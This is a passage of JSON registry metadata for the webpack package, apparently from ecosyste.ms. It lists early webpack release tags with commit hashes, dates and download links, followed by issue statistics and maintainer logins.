1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:47:50.996Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/nodePackages_latest.webpack?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages_latest.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"